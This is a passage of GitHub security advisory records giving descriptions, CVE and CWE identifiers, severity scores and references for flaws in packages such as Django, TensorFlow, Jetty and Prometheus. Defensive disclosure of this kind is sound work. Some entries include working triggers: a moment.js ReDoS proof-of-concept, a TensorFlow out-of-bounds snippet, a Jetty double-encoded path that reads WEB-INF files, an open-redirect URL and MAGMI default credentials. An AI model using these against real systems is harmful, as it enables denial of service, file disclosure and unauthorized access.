{'https://github.com/andialbrecht/sqlparse/commit/8238a9e450ed1524e40cb3a8b0b3c00606903aeb', 'https://securitylab.github.com/advisories/GHSL-2021-107-andialbrecht-sqlparse/', 'https://github.com/andialbrecht/sqlparse/security/advisories/GHSA-p5w8-wqhj-9hhf', 'https://nvd.nist.gov/vuln/detail/CVE-2021-32839', 'https://github.com/advisories/GHSA-p5w8-wqhj-9hhf'}
null
GHSA
GHSA-6m6m-j2hm-pxrg
Malicious Package in cicada-render
All versions of `cicada-render` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it. ## Recommendation Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
null
2021-09-30T19:33:37Z
2020-09-03T17:37:05Z
CRITICAL
9.8
{'CWE-506'}
{'https://www.npmjs.com/advisories/1051', 'https://github.com/advisories/GHSA-6m6m-j2hm-pxrg'}
null
GHSA
GHSA-7j36-gc4r-9x3r
Out of bounds access in compact_arena
An issue was discovered in the compact_arena crate before 0.4.0 for Rust. Generativity is mishandled, leading to an out-of-bounds write or read.
{'CVE-2019-16139'}
2021-08-25T20:44:48Z
2021-08-25T20:44:48Z
CRITICAL
9.8
{'CWE-787', 'CWE-125'}
{'https://github.com/advisories/GHSA-7j36-gc4r-9x3r', 'https://rustsec.org/advisories/RUSTSEC-2019-0015.html', 'https://nvd.nist.gov/vuln/detail/CVE-2019-16139', 'https://github.com/llogiq/compact_arena/issues/22'}
null
GHSA
GHSA-vx57-7f4q-fpc7
Arbitrary redirects under /new endpoint
### Impact In 2.23.0, Prometheus changed its default UI to the New ui. To ensure a seamless transition, the URL's prefixed by /new redirect to /. Due to a bug in the code, it is possible for an attacker to craft an URL that can redirect to any other URL, in the /new endpoint. If a user visits a prometheus server with a specially crafted address (e.g.: `http://127.0.0.1:9090/new/new<url>`), they can be redirected to an arbitrary URL. e.g. if a user visits http://127.0.0.1:9090/new/newhttp://www.google.com/, they will be redirected to http://google.com. ### Patches The issue will be patched in 2.26.1 and 2.27.1 releases. In 2.28.0, the /new endpoint will be removed completely. ### Workarounds The workaround is to disable access to /new via a reverse proxy in front of Prometheus. Note: Users who use a `--web.external-url=` flag _with a path_ (e.g. `--web.external-url=http://example.com/prometheus`) are not affected. ### For more information If you have any questions or comments about this advisory, please use our community channels (https://prometheus.io/community). Our security policy is available at https://prometheus.io/docs/operating/security/
{'CVE-2021-29622'}
2022-04-19T19:02:57Z
2022-02-15T01:57:18Z
MODERATE
6.1
{'CWE-601'}
{'https://github.com/prometheus/prometheus/releases/tag/v2.26.1', 'https://github.com/prometheus/prometheus/security/advisories/GHSA-vx57-7f4q-fpc7', 'https://github.com/advisories/GHSA-vx57-7f4q-fpc7', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29622', 'https://github.com/prometheus/prometheus/releases/tag/v2.27.1'}
null
GHSA
GHSA-qfjv-998w-q48f
High severity vulnerability that affects org.apache.syncope:syncope-core
An administrator with workflow definition entitlements can use DTD to perform malicious operations, including but not limited to file read, file write, and code execution.
{'CVE-2018-17186'}
2021-09-16T19:56:57Z
2018-11-06T23:15:46Z
HIGH
7.2
{'CWE-611'}
{'https://github.com/advisories/GHSA-qfjv-998w-q48f', 'https://syncope.apache.org/security#CVE-2018-17186:_XXE_on_BPMN_definitions', 'https://nvd.nist.gov/vuln/detail/CVE-2018-17186'}
null
GHSA
GHSA-qm4q-f956-fg64
Malicious Package in luna-mock
All versions of `luna-mock` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it. ## Recommendation Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
null
2021-09-30T19:50:02Z
2020-09-03T17:39:13Z
CRITICAL
9.8
{'CWE-506'}
{'https://www.npmjs.com/advisories/1055', 'https://github.com/advisories/GHSA-qm4q-f956-fg64'}
null
GHSA
GHSA-686h-j8r8-wmfm
Data races in rcu_cell
Affected versions of this crate unconditionally implement Send/Sync for `RcuCell<T>`. This allows users to send `T: !Send` to other threads (while `T` enclosed within `RcuCell<T>`), and allows users to concurrently access `T: !Sync` by using the APIs of `RcuCell<T>` that provide access to `&T`. This can result in memory corruption caused by data races.
{'CVE-2020-36451'}
2021-08-25T20:57:14Z
2021-08-25T20:57:14Z
HIGH
8.1
{'CWE-362', 'CWE-77'}
{'https://github.com/advisories/GHSA-686h-j8r8-wmfm', 'https://github.com/Xudong-Huang/rcu_cell/pull/4', 'https://github.com/Xudong-Huang/rcu_cell/issues/3', 'https://github.com/Xudong-Huang/rcu_cell/pull/4/commits/1faf18eee11f14969b77ae0f76dcd9ebd437d0c2', 'https://rustsec.org/advisories/RUSTSEC-2020-0131.html', 'https://nvd.nist.gov/vuln/detail/CVE-2020-36451'}
null
GHSA
GHSA-cqff-fx2x-p86v
Improper Authentication
### Impact A maliciously crafted claim may be incorrectly authenticated by the bot. Impacts bots that are not configured to be used as a Skill. This vulnerability requires an attacker to have internal knowledge of the bot. ### Patches The problem has been patched in all affected versions. Please see the list of patched versions for the most appropiate one for your individual case. ### Workarounds Users who do not wish or are not able to upgrade can add an authentication configuration containing ClaimsValidator, which throws an exception if Claims are Skill Claims. For detailed instructions, see the link in the References section. ### For more information If you have any questions or comments about this advisory: * Open an issue in [Microsoft Bot Builder SDK](https://github.com/microsoft/botframework-sdk) * Email us at [bf-reports@microsoft.com](mailto:bf-reports@microsoft.com)
null
2021-03-08T15:50:10Z
2021-03-08T15:50:10Z
HIGH
0
{'CWE-287'}
{'https://github.com/microsoft/botbuilder-python/security/advisories/GHSA-cqff-fx2x-p86v', 'https://github.com/advisories/GHSA-cqff-fx2x-p86v', 'https://pypi.org/project/botframework-connector/', 'https://github.com/microsoft/botbuilder-python/blob/main/doc/SkillClaimsValidation.md'}
null
GHSA
GHSA-93wh-35r4-6qmw
Exposure of Sensitive Information to an Unauthorized Actor in moodle
It was possible for some users without permission to view other users' full names to do so via the online users block in moodle before 3.10.2, 3.9.5, 3.8.8, 3.5.17.
{'CVE-2021-20281'}
2021-03-29T20:43:23Z
2021-03-29T20:43:23Z
MODERATE
5.3
{'CWE-200'}
{'https://bugzilla.redhat.com/show_bug.cgi?id=1939041', 'https://github.com/advisories/GHSA-93wh-35r4-6qmw', 'https://github.com/moodle/moodle/commit/33d6017287e1835513a3de8edd3fbf7a6a90af9c', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UFH5DDMU5TZ3JT4Q52WMRAHACA5MHIMT/', 'https://nvd.nist.gov/vuln/detail/CVE-2021-20281', 'https://moodle.org/mod/forum/discuss.php?d=419652', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AFSNJ7XHVTC52RSRX2GBQFF3VEEAY2MS/'}
null
GHSA
GHSA-2x75-mf24-588m
Out-of-bounds write
A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1062, CVE-2019-1103, CVE-2019-1106, CVE-2019-1107.
{'CVE-2019-1092'}
2021-03-29T20:59:11Z
2021-03-29T20:59:11Z
HIGH
7.5
{'CWE-787'}
{'https://github.com/chakra-core/ChakraCore/commit/d4e767fb946128c135d77edda7a794561e1c1f06', 'https://github.com/chakra-core/ChakraCore/commit/75162b7f2d8ac2b37d17564e9c979ba1bae707e8', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1092', 'https://nvd.nist.gov/vuln/detail/CVE-2019-1092', 'https://github.com/advisories/GHSA-2x75-mf24-588m'}
null
GHSA
GHSA-3rpr-mg43-xhq4
High severity vulnerability that affects auth0-js
A cross-origin vulnerability has been discovered in the Auth0 auth0.js library affecting versions &lt; 8.12. This vulnerability allows an attacker to acquire authenticated users' tokens and invoke services on a user's behalf if the target site or application uses a popup callback page with auth0.popup.callback().
{'CVE-2017-17068'}
2021-08-31T21:24:03Z
2017-12-21T00:47:20Z
HIGH
7.5
{'CWE-200'}
{'https://auth0.com/docs/security/bulletins/cve-2017-17068', 'https://nvd.nist.gov/vuln/detail/CVE-2017-17068', 'https://github.com/advisories/GHSA-3rpr-mg43-xhq4', 'https://appcheck-ng.com/appcheck-discovers-vulnerability-auth0-library-cve-2017-17068/'}
null
GHSA
GHSA-j667-c2hm-f2wp
Insertion of Sensitive Information into Log File and Improper Output Neutralization for Logs in ansible
A flaw was found in the Ansible Engine when using module_args. Tasks executed with check mode (--check-mode) do not properly neutralize sensitive data exposed in the event data. This flaw allows unauthorized users to read this data. The highest threat from this vulnerability is to confidentiality.
{'CVE-2020-14332'}
2022-04-07T15:10:52Z
2022-02-09T21:59:39Z
MODERATE
5.5
{'CWE-117', 'CWE-532'}
{'https://www.debian.org/security/2021/dsa-4950', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-14332', 'https://nvd.nist.gov/vuln/detail/CVE-2020-14332', 'https://github.com/advisories/GHSA-j667-c2hm-f2wp', 'https://github.com/ansible/ansible/pull/71033'}
null
GHSA
GHSA-6mx3-3vqg-hpp2
Django allows unprivileged users can read the password hashes of arbitrary accounts
An issue was discovered in Django 2.1 before 2.1.2, in which unprivileged users can read the password hashes of arbitrary accounts. The read-only password widget used by the Django Admin to display an obfuscated password hash was bypassed if a user has only the "view" permission (new in Django 2.1), resulting in display of the entire password hash to those users. This may result in a vulnerability for sites with legacy user accounts using insecure hashes.
{'CVE-2018-16984'}
2022-04-26T18:34:52Z
2018-10-03T20:07:39Z
MODERATE
4.9
{'CWE-522'}
{'https://nvd.nist.gov/vuln/detail/CVE-2018-16984', 'https://github.com/advisories/GHSA-6mx3-3vqg-hpp2', 'https://security.netapp.com/advisory/ntap-20190502-0009/', 'http://www.securitytracker.com/id/1041749', 'https://www.djangoproject.com/weblog/2018/oct/01/security-release/'}
null
GHSA
GHSA-g6v7-vqhx-6v6c
XML External Entity Reference in org.opencms:opencms-core
An XML external entity (XXE) vulnerability in Alkacon OpenCms 11.0, 11.0.1 and 11.0.2 allows remote authenticated users with edit privileges to exfiltrate files from the server's file system by uploading a crafted SVG document.
{'CVE-2021-3312'}
2021-10-18T18:40:16Z
2021-10-12T17:23:40Z
MODERATE
6.5
{'CWE-611'}
{'https://github.com/alkacon/opencms-core/issues/725', 'https://github.com/advisories/GHSA-g6v7-vqhx-6v6c', 'https://github.com/alkacon/opencms-core/commit/92e035423aa6967822d343e54392d4291648c0ee', 'https://github.com/alkacon/opencms-core/releases', 'https://github.com/alkacon/opencms-core/issues/721', 'https://nvd.nist.gov/vuln/detail/CVE-2021-3312'}
null
GHSA
GHSA-87vv-r9j6-g5qv
Regular Expression Denial of Service in moment
Versions of `moment` prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into `moment.duration()`. ## Proof of concept ``` var moment = require('moment'); var genstr = function (len, chr) { var result = ""; for (i=0; i<=len; i++) { result = result + chr; } return result; } for (i=20000;i<=10000000;i=i+10000) { console.log("COUNT: " + i); var str = '-' + genstr(i, '1') console.log("LENGTH: " + str.length); var start = process.hrtime(); moment.duration(str) var end = process.hrtime(start); console.log(end); } ``` ### Results ``` $ node moment.js COUNT: 20000 LENGTH: 20002 [ 0, 618931029 ] COUNT: 30001 LENGTH: 30003 [ 1, 401413894 ] COUNT: 40002 LENGTH: 40004 [ 2, 437075303 ] COUNT: 50003 LENGTH: 50005 [ 3, 824664804 ] COUNT: 60004 LENGTH: 60006 [ 5, 651335262 ] ``` ## Recommendation Please update to version 2.11.2 or later.
{'CVE-2016-4055'}
2021-09-07T14:33:56Z
2017-10-24T18:33:35Z
MODERATE
6.5
{'CWE-400'}
{'https://nodesecurity.io/advisories/55', 'http://www.securityfocus.com/bid/95849', 'https://github.com/advisories/GHSA-87vv-r9j6-g5qv', 'https://www.tenable.com/security/tns-2019-02', 'https://lists.apache.org/thread.html/52bafac05ad174000ea465fe275fd3cc7bd5c25535a7631c0bc9bfb2@%3Cuser.flink.apache.org%3E', 'https://lists.apache.org/thread.html/10f0f3aefd51444d1198c65f44ffdf2d78ca3359423dbc1c168c9731@%3Cdev.flink.apache.org%3E', 'http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html', 'https://www.npmjs.com/advisories/55', 'https://lists.apache.org/thread.html/54df3aeb4239b64b50b356f0ca6f986e3c4ca5b84c515dce077c7854@%3Cuser.flink.apache.org%3E', 'http://www.openwall.com/lists/oss-security/2016/04/20/11', 'https://lists.apache.org/thread.html/17ff53f7999e74fbe3cc0ceb4e1c3b00b180b7c5afec8e978837bc49@%3Cuser.flink.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2016-4055'}
null
GHSA
GHSA-j257-jfvv-h3x5
Privilege Escalation in Channelmgnt plug-in for Sopel
### Impact Malicious users are able to op/voice and take over a channel ### Patches On version 1.0.3 ### Workarounds Disable channelmgnt ### References https://phab.bots.miraheze.wiki/T117 ### For more information If you have any questions or comments about this advisory: * Email us at [staff(at)mirahezebots(dot)org](mailto:staff@mirahezebots.org)
{'CVE-2020-15251'}
2022-04-19T19:02:38Z
2020-10-13T17:30:30Z
HIGH
7.7
{'CWE-862', 'CWE-863'}
{'https://github.com/MirahezeBots/sopel-channelmgnt/security/advisories/GHSA-j257-jfvv-h3x5', 'https://phab.bots.miraheze.wiki/T117', 'https://github.com/MirahezeBots/MirahezeBots/security/advisories/GHSA-23pc-4339-95vg', 'https://phab.bots.miraheze.wiki/phame/live/1/post/1/summary/', 'https://nvd.nist.gov/vuln/detail/CVE-2020-15251', 'https://github.com/advisories/GHSA-j257-jfvv-h3x5', 'https://pypi.org/project/sopel-plugins.channelmgnt/', 'https://github.com/MirahezeBots/sopel-channelmgnt/pull/3'}
null
GHSA
GHSA-cgfm-62j4-v4rf
Heap out of bounds access in sparse reduction operations
### Impact The implementation of sparse reduction operations in TensorFlow can trigger accesses outside of bounds of heap allocated data: ```python import tensorflow as tf x = tf.SparseTensor( indices=[[773, 773, 773], [773, 773, 773]], values=[1, 1], dense_shape=[337, 337, 337]) tf.sparse.reduce_sum(x, 1) ``` The [implementation](https://github.com/tensorflow/tensorflow/blob/a1bc56203f21a5a4995311825ffaba7a670d7747/tensorflow/core/kernels/sparse_reduce_op.cc#L217-L228) fails to validate that each reduction group does not overflow and that each corresponding index does not point to outside the bounds of the input tensor. ### Patches We have patched the issue in GitHub commit [87158f43f05f2720a374f3e6d22a7aaa3a33f750](https://github.com/tensorflow/tensorflow/commit/87158f43f05f2720a374f3e6d22a7aaa3a33f750). The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ### Attribution This vulnerability has been reported by members of the Aivul Team from Qihoo 360.
{'CVE-2021-37635'}
2021-08-25T14:44:17Z
2021-08-25T14:44:17Z
HIGH
7.3
{'CWE-125'}
{'https://github.com/tensorflow/tensorflow/commit/87158f43f05f2720a374f3e6d22a7aaa3a33f750', 'https://github.com/advisories/GHSA-cgfm-62j4-v4rf', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-cgfm-62j4-v4rf', 'https://nvd.nist.gov/vuln/detail/CVE-2021-37635'}
null
GHSA
GHSA-g475-pch5-6wvv
Authentication bypass in MAGMI
MAGMI versions prior to 0.7.24 are vulnerable to a remote authentication bypass due to allowing default credentials in the event there is a database connection failure. A remote attacker can trigger this connection failure if the Mysql setting max_connections (default 151) is lower than Apache (or another web server) setting MaxRequestWorkers (formerly MaxClients) (default 256). This can be done by sending at least 151 simultaneous requests to the Magento website to trigger a "Too many connections" error, then use default magmi:magmi basic authentication to remotely bypass authentication.
{'CVE-2020-5777'}
2021-05-06T18:54:35Z
2021-05-06T18:54:35Z
CRITICAL
9.8
{'CWE-287'}
{'https://nvd.nist.gov/vuln/detail/CVE-2020-5777', 'https://github.com/dweeves/magmi-git/commit/dde71de5cfd505fe78e5caf21d6531b61450a16f', 'https://www.tenable.com/security/research/tra-2020-51', 'https://github.com/advisories/GHSA-g475-pch5-6wvv'}
null
GHSA
GHSA-4g9f-63rx-5cw4
Segfault in Tensorflow
### Impact The [`tf.raw_ops.Switch`](https://www.tensorflow.org/api_docs/python/tf/raw_ops/Switch) operation takes as input a tensor and a boolean and outputs two tensors. Depending on the boolean value, one of the tensors is exactly the input tensor whereas the other one should be an empty tensor. However, the eager runtime traverses all tensors in the output: https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/common_runtime/eager/kernel_and_device.cc#L308-L313 Since only one of the tensors is defined, the other one is `nullptr`, hence we are binding a reference to `nullptr`. This is undefined behavior and reported as an error if compiling with `-fsanitize=null`. In this case, this results in a segmentation fault ### Patches We have patched the issue in da8558533d925694483d2c136a9220d6d49d843c and will release a patch release for all affected versions. We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1. ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ### Attribution This vulnerability has been reported by members of the Aivul Team from Qihoo 360.
{'CVE-2020-15190'}
2021-08-26T15:09:20Z
2020-09-25T18:28:14Z
MODERATE
5.3
{'CWE-20', 'CWE-476'}
{'http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00065.html', 'https://nvd.nist.gov/vuln/detail/CVE-2020-15190', 'https://github.com/advisories/GHSA-4g9f-63rx-5cw4', 'https://github.com/tensorflow/tensorflow/releases/tag/v2.3.1', 'https://github.com/tensorflow/tensorflow/commit/da8558533d925694483d2c136a9220d6d49d843c', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-4g9f-63rx-5cw4'}
null
GHSA
GHSA-f6p7-8xfw-fjqq
Authenticated Stored XSS in Administration
### Impact Authenticated Stored XSS in Administration ### Patches We recommend updating to the current version 5.6.10. You can get the update to 5.6.10 regularly via the Auto-Updater or directly via the download overview. For older versions you can use the Security Plugin: https://store.shopware.com/en/swag575294366635f/shopware-security-plugin.html ### References https://docs.shopware.com/en/shopware-5-en/security-updates/security-update-05-2021
null
2021-05-21T14:29:26Z
2021-05-21T14:29:26Z
MODERATE
0
{'CWE-79'}
{'https://docs.shopware.com/en/shopware-5-en/security-updates/security-update-05-2021', 'https://github.com/shopware/shopware/security/advisories/GHSA-f6p7-8xfw-fjqq', 'https://github.com/advisories/GHSA-f6p7-8xfw-fjqq'}
null
GHSA
GHSA-6cc6-66f5-mxjj
Out-of-bounds write in ChakraCore
A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-0768, CVE-2020-0823, CVE-2020-0825, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829, CVE-2020-0830, CVE-2020-0831, CVE-2020-0832, CVE-2020-0833, CVE-2020-0848.
{'CVE-2020-0826'}
2021-07-28T18:58:03Z
2021-07-28T18:58:03Z
HIGH
7.5
{'CWE-787'}
{'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0826', 'https://github.com/advisories/GHSA-6cc6-66f5-mxjj', 'https://nvd.nist.gov/vuln/detail/CVE-2020-0826'}
null
GHSA
GHSA-8cvr-4rrf-f244
Infinite open connection causes OctoRPKI to hang forever
OctoRPKI does not limit the length of a connection, allowing for a slowloris DOS attack to take place which makes OctoRPKI wait forever. Specifically, the repository that OctoRPKI sends HTTP requests to will keep the connection open for a day before a response is returned, but does keep drip feeding new bytes to keep the connection alive. ## Patches ## For more information If you have any questions or comments about this advisory email us at security@cloudflare.com
{'CVE-2021-3909'}
2022-01-13T18:25:36Z
2021-11-10T20:15:44Z
MODERATE
4.4
{'CWE-400'}
{'https://github.com/advisories/GHSA-8cvr-4rrf-f244', 'https://www.debian.org/security/2022/dsa-5041', 'https://www.debian.org/security/2021/dsa-5033', 'https://github.com/cloudflare/cfrpki/security/advisories/GHSA-8cvr-4rrf-f244', 'https://nvd.nist.gov/vuln/detail/CVE-2021-3909', 'https://github.com/cloudflare/cfrpki/releases/tag/v1.4.0'}
null
GHSA
GHSA-5rm3-qhxf-rh3r
Downloads Resources over HTTP in co-cli-installer
Affected versions of `co-cli-installer` insecurely download an executable over an unencrypted HTTP connection. In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `co-cli-installer`. ## Recommendation No patch is currently available for this vulnerability. The best mitigation is currently to avoid using this package, using a different package if available. Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.
{'CVE-2016-10657'}
2021-01-08T19:48:26Z
2019-02-18T23:45:10Z
HIGH
0
{'CWE-311'}
{'https://nvd.nist.gov/vuln/detail/CVE-2016-10657', 'https://github.com/advisories/GHSA-5rm3-qhxf-rh3r', 'https://www.npmjs.com/advisories/268', 'https://nodesecurity.io/advisories/268'}
null
GHSA
GHSA-w24h-v9qh-8gxj
SQL Injection in Django
A SQL injection issue was discovered in QuerySet.explain() in Django 2.2 before 2.2.28, 3.2 before 3.2.13, and 4.0 before 4.0.4. This occurs by passing a crafted dictionary (with dictionary expansion) as the **options argument, and placing the injection payload in an option name.
{'CVE-2022-28347'}
2022-04-22T23:29:02Z
2022-04-13T00:00:33Z
CRITICAL
9.8
{'CWE-89'}
{'https://www.djangoproject.com/weblog/2022/apr/11/security-releases/', 'https://github.com/django/django/commit/6723a26e59b0b5429a0c5873941e01a2e1bdbb81', 'http://www.openwall.com/lists/oss-security/2022/04/11/1', 'https://docs.djangoproject.com/en/4.0/releases/security/', 'https://nvd.nist.gov/vuln/detail/CVE-2022-28347', 'https://github.com/advisories/GHSA-w24h-v9qh-8gxj', 'https://groups.google.com/forum/#!forum/django-announce'}
null
GHSA
GHSA-gwcr-j4wh-j3cq
Jetty Utility Servlets ConcatServlet Double Decoding Information Disclosure Vulnerability
Requests to the `ConcatServlet` and `WelcomeFilter` are able to access protected resources within the `WEB-INF` directory. For example a request to the `ConcatServlet` with a URI of `/concat?/%2557EB-INF/web.xml` can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application. This occurs because both `ConcatServlet` and `WelcomeFilter` decode the supplied path to verify it is not within the `WEB-INF` or `META-INF` directories. It then uses this decoded path to call `RequestDispatcher` which will also do decoding of the path. This double decoding allows paths with a doubly encoded `WEB-INF` to bypass this security check. ### Impact This affects all versions of `ConcatServlet` and `WelcomeFilter` in versions before 9.4.41, 10.0.3 and 11.0.3. ### Workarounds If you cannot update to the latest version of Jetty, you can instead deploy your own version of the [`ConcatServlet`](https://github.com/eclipse/jetty.project/blob/4204526d2fdad355e233f6bf18a44bfe028ee00b/jetty-servlets/src/main/java/org/eclipse/jetty/servlets/ConcatServlet.java) and/or the [`WelcomeFilter`](https://github.com/eclipse/jetty.project/blob/4204526d2fdad355e233f6bf18a44bfe028ee00b/jetty-servlets/src/main/java/org/eclipse/jetty/servlets/WelcomeFilter.java) by using the code from the latest version of Jetty.
{'CVE-2021-28169'}
2022-04-22T15:46:37Z
2021-06-10T15:43:22Z
MODERATE
5.3
{'CWE-200'}
{'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://www.debian.org/security/2021/dsa-4949', 'https://lists.apache.org/thread.html/r284de9c5399486dfff12ab9e7323ca720dd7019a9a3e11c8510a7140@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r32b0b640ad2be3b858f0af51c68a7d5c5a66a462c8bbb93699825cd3@%3Cissues.zookeeper.apache.org%3E', 'https://github.com/eclipse/jetty.project/security/advisories/GHSA-gwcr-j4wh-j3cq', 'https://lists.apache.org/thread.html/r04a4b4553a23aff26f42635a6ae388c3b162aab30a88d12e59d05168@%3Cjira.kafka.apache.org%3E', 'https://github.com/advisories/GHSA-gwcr-j4wh-j3cq', 'https://lists.apache.org/thread.html/ref1c161a1621504e673f9197b49e6efe5a33ce3f0e6d8f1f804fc695@%3Cjira.kafka.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://lists.apache.org/thread.html/rf36f1114e84a3379b20587063686148e2d5a39abc0b8a66ff2a9087a@%3Cissues.zookeeper.apache.org%3E', 'https://security.netapp.com/advisory/ntap-20210727-0009/', 'https://lists.apache.org/thread.html/r91e34ff61aff8fd25a3f2a21539597c6ef7589a31c199b0a9546477c@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r2721aba31a8562639c4b937150897e24f78f747cdbda8641c0f659fe@%3Cusers.kafka.apache.org%3E', 'https://www.oracle.com/security-alerts/cpujan2022.html', 'https://lists.apache.org/thread.html/r29678972c3f8164b151fd7a5802785d402e530c09870a82ffc7681a4@%3Cdev.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/rfff6ff8ffb31e8a32619c79774def44b6ffbb037c128c5ad3eab7171@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rd5b52362f5edf98e0dcab6541a381f571cccc05ad9188e793af688f3@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/rddbb4f8d5db23265bb63d14ef4b3723b438abc1589f877db11d35450@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rbefa055282d52d6b58d29a79fbb0be65ab0a38d25f00bd29eaf5e6fd@%3Cnotifications.zookeeper.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2021-28169', 'https://lists.apache.org/thread.html/r8a1a332899a1f92c8118b0895b144b27a78e3f25b9d58a34dd5eb084@%3Cnotifications.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r67c4f90658fde875521c949448c54c98517beecdc7f618f902c620ec@%3Cissues.zookeeper.apache.org%3E', 'https://lists.debian.org/debian-lts-announce/2021/06/msg00017.html', 'https://lists.apache.org/thread.html/rb1292d30462b9baedea7c5d9594fc75990d9aa0ec223b48054ca9c25@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r234f6452297065636356f43654cdacef565b8f9ceb0e0c07ffb8c73b@%3Cdev.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r33eb06b05afbc7df28d31055cae0cb3fd36cab808c884bf6d680bea5@%3Cdev.zookeeper.apache.org%3E'}
null
GHSA
GHSA-277v-gwfr-hmpj
Missing Authentication for Critical Function in LibreNMS
An issue was discovered in LibreNMS through 1.47. A number of scripts import the Authentication libraries, but do not enforce an actual authentication check. Several of these scripts disclose information or expose functions that are of a sensitive nature and are not expected to be publicly accessible.
{'CVE-2019-10668'}
2021-05-11T15:02:40Z
2019-10-11T18:43:06Z
MODERATE
9.1
{'CWE-306'}
{'https://github.com/advisories/GHSA-277v-gwfr-hmpj', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10668', 'https://www.darkmatter.ae/xen1thlabs/librenms-authentication-bypass-vulnerability-xl-19-016/'}
null
GHSA
GHSA-94mf-xfg5-r247
Moderate severity vulnerability that affects invenio-app
## APP_ALLOWED_HOSTS not always preventing host header injection ### Impact A possible host header injection attack have been identified in Invenio-App. For an attack to be possible, all conditions below must be met: 1. Your webserver must have been configured to route all requests to your application. 2. You must have relied on ``APP_ALLOWED_HOSTS`` configuration variable to whitelist allowed host headers. 3. Flask's ``request.host`` must not have been evaluated during request handling. An example of a view which does not evalute ``request.host`` is a simple view using just ``url_for`` to generate an external URL (similar is possible when rendering just a Jinja template): ```python @app.route('/') def index(): return url_for('index_url', _external=True) ``` This happens, because Werkzeug's trusted host feature, which ``APP_ALLOWED_HOSTS`` rely on, does not check the the list of trusted hosts in it's routing system that ``url_for`` is relying on. ### Patches Invenio-App v1.0.6 and v1.1.1 fully fix the issue. Note, we strongly recommend (see [Securing your instance](https://invenio.readthedocs.io/en/latest/deployment/securing-your-instance.html#allowed-hosts)) that you never route requests to your application with a wrong host header. The ``APP_ALLOWED_HOSTS`` configuration variable exists as an extra protective measure because it is easy to misconfigure your web server to allow requests with any host header. ### Workaround 1 - Configure your webserver You should ensure that you never route requests with a wrong host header to your application. The workaround depends on which web server you are using to proxy requests to your application. In general it involves ensuring that the web server has two virtual hosts defined: 1. **Default virtual host**: a dummy default virtual host that by default is used unless the webserver can match the host header to another virtual host (i.e. a catch-all). 2. **Application virtual host**: the application virtual host responsible for proxing requests to the application, and configured to only reply to a whitelist of host headers. Note, for instance in Nginx if you only configure the application virtual host, by default, it will also act as the default virtual host despite you having configured a whitelist of host headers. Below is an example for Nginx. Note for clarity we have only included the virtual host for port 443, but this also extends to virtual hosts running on any other port. ``` # etc/nginx/nginx.conf http { # ... include /etc/nginx/conf.d/*.conf; } ``` **Default virtual host** Notice, the ``server_name`` is ``_`` and the ``listen`` directive has it marked as ``default_server``. ``` # etc/nginx/conf.d/default.conf server { listen 443 default_server; listen [::]:443 default_server; server_name _; # ... return 301 https://www.example.com; } ``` **Application virtual host** Notice, the ``server_name`` is set to the host header whitelist. ``` # etc/nginx/conf.d/app.conf server { listen 443; listen [::]:443; server_name www.example.com; # ... } ``` ### Workaround 2 - Include application snippet We strongly recommend that you use the method described in Workaround 1. If you are not able to upgrade to the patched versions of Invenio-App, you can include the following code snippet in your application to force evaluation of ``request.hosts``. ```python @app.before_request def before_request(): request.host ``` ### For more information If you have any questions or comments about this advisory: * Email us at 